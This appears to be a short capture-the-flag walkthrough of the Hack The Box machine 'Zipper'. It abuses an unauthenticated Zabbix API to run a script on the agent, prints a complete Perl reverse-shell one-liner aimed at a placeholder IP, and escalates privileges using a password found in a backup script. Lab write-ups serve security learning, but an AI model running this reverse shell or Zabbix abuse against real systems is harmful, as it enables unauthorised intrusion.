HTB-靶机 Zipper-Writeup

Usually scan，nmap+dirb+gobuster+msftcp find zabbix，ver3.0.21： think about zabbix has jsrpc.php，any exploit？，json interface is not authorized to access，search it： python has library named zabbixapi，https://github.com/lukecyca/pyzabbix EXP. add host：http://blog.chinaunix.net/uid-28309325-id-5176638.html createuser.py： createscript.py： The execute script must execute on zabbix agent not on server cuz server its a docker container the panel of script before： after excute the script： editor the script，use the stable perl or python to backconnect： perl-e'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
create events or triggers，filter use any，more hosts possible： ncat to listen： find the files of user zapper is permission denied,cat the backup.sh： /usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null shell for backup，-p could be the pwd for zapper zapper can not ssh： use python to get a interactive shell： so can use su，input the pwd，login successfully： get user.txt search folder： The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us suid is running by root download the pdf of writeup 文章来源：lsh4ck's Blog